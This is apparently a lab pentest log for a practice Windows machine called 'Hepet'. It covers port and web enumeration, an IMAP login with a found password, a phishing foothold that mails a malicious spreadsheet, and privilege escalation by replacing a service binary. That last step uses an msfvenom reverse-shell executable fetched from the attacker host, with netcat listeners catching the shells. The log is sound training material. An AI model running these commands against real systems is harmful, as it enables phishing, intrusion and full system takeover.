🧪 Pentest Log: {{date:2025-08-04}}

🔍 Target Information

• Machine Name: Hepet
• IP Address: 192.168.223.140
• Operating System: Windows

ip=192.168.223.140

📡 Enumeration

🔌 Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) 

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 25

Port 79

Port 110

Port 135

rpcclient -U '' -N $ip

Port 139/445

smbclient -L \\\\$ip\\

enum4linux -a $ip

Port 143

nc $ip 143

A1 LOGIN "jonas" "SicMundusCreatusEst"
A1 LIST "" *
A1 SELECT INBOX

A1 FETCH 2 body[text]
A1 FETCH 2 all

Port 2224

Port 8000

Web Content Enumeration

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip -r -o dirsearch.txt

found jonas' password within the main page

jonas:SicMundusCreatusEst

Port 11100

Port 20001

Anonymous Login

ftp anonymous@$ip -p 20001

💣 Exploitation / Foothold

📌 Vulnerability Summary

• Service / Port: 143
• Vulnerability Type: Phishing

🚀 Exploit Execution

🔧 Exploit Method

• Manual
• Public Exploit
• Custom Script

Tool / Script Used:

python3 mmg-ods.py windows 192.168.45.163 1337


sudo swaks -t mailadmin@localhost --from jonas@localhost --attach @file.ods --server $ip --body "Please check this spreadsheet" --header "Subject: Please check this spreadsheet"

python3 -m http.server 80


nc -lvnp 1337

🧬 Privilege Escalation

👤 Current Access

• User: Ela Arwel
• Groups: N/A
• Shell Type: powershell reverse shell

🔍 Enumeration

PowerUp:

Import-Module ./PowerUp.ps1

Invoke-AllChecks

found

ServiceName    : VeyonService
Path           : C:\Users\Ela Arwel\Veyon\veyon-service.exe
ModifiablePath : @{ModifiablePath=C:\Users\Ela Arwel\Veyon\veyon-service.exe; IdentityReference=HEPET\Ela Arwel; 
                 Permissions=System.Object[]}
StartName      : LocalSystem
AbuseFunction  : Write-ServiceBinary -Name 'VeyonService' -Path <HijackPath>
CanRestart     : False
Name           : VeyonService
Check          : Unquoted Service Paths

🔓 Privilege Escalation Exploit

📌 Exploit Summary

• Technique Used: Service Binary Hijacking
• Target Binary/Service: VeyonService
• Reference / Source: N/A

🔧 Exploit Steps

• Setup

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.163 LPORT=33060 -f exe -o shell.exe

mv veyon-service.exe veyon-service.exe.bak

iwr -uri http://192.168.45.163/shell.exe -Outfile veyon-service.exe

• Smash to root

shutdown /r /t 0

nc -lvnp 33060